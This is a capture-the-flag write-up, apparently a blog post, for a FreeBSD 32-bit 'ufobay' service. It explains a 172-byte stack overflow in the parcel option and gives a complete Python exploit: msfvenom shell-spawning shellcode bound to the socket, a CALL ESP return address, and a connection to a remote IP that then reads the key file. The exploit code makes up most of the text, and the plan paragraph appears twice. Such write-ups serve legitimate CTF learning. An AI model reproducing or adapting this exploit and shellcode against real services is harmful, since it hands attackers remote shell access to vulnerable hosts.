The given binary is a 32 bit FreeBSD ELF executable, statically linked. Setting up a FreeBSD 9.1 VM, I started analysing the binary. Binary requires a user ufobay and database file /home/ufobay/ufobay.db. We noticed a buffer overflow vulnerability in option 1, where it gets parcel. User can supply 256 bytes of data. 172 bytes of data can overwrite the saved EIP.
Here is the idea of exploit:
[*] Overwrite saved EIP with CALL ESP gadget
[*] Place the shellcode immediately after the CALL ESP gadget
Below is the exploit:
Here is the idea of exploit:
[*] Overwrite saved EIP with CALL ESP gadget
[*] Place the shellcode immediately after the CALL ESP gadget
Below is the exploit:
#!/usr/bin/env python
import struct
import socket
import time
# msfvenom -p bsd/x86/exec CMD='/bin/sh -c sh<&5 >&5' -a x86_64 -b '\x0a'
shellcode = ( "\x6a\x3b\x58\x99\x52\x68\x2d\x63\x00\x00\x89\xe7\x52\x68" +
"\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\xe8\x15" +
"\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20" +
"\x73\x68\x3c\x26\x35\x20\x3e\x26\x35\x00\x57\x53\x89\xe1" +
"\x52\x51\x53\x50\xcd\x80")
ret_addr = struct.pack("<I", 0x080ff46d) # call esp
NOP = struct.pack("B", 0x90)
EBP = struct.pack("<I", 0x0815c080)
payload = NOP * 168 + EBP + ret_addr + shellcode
ip = '92.63.96.226'
#ip = '192.168.122.200'
port = 1337
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
time.sleep(1)
print soc.recv(1024)
# option
soc.send("1\n")
time.sleep(0.5)
print soc.recv(512)
# source
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)
# destination
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)
# size
soc.send(str(len(payload)) + "\n")
time.sleep(0.5)
print soc.recv(512)
# parcel
soc.send(payload + "\n")
time.sleep(0.5)
soc.send("cat key\n")
time.sleep(0.5)
print soc.recv(1024)
Flag for the challenge is H0wCanW3D3F3atAL1ENZ
Could you please to share the challenge file ?
ReplyDeleteThank you very much
:)
Deletehttp://www.mediafire.com/?nj4dhguho92kqgn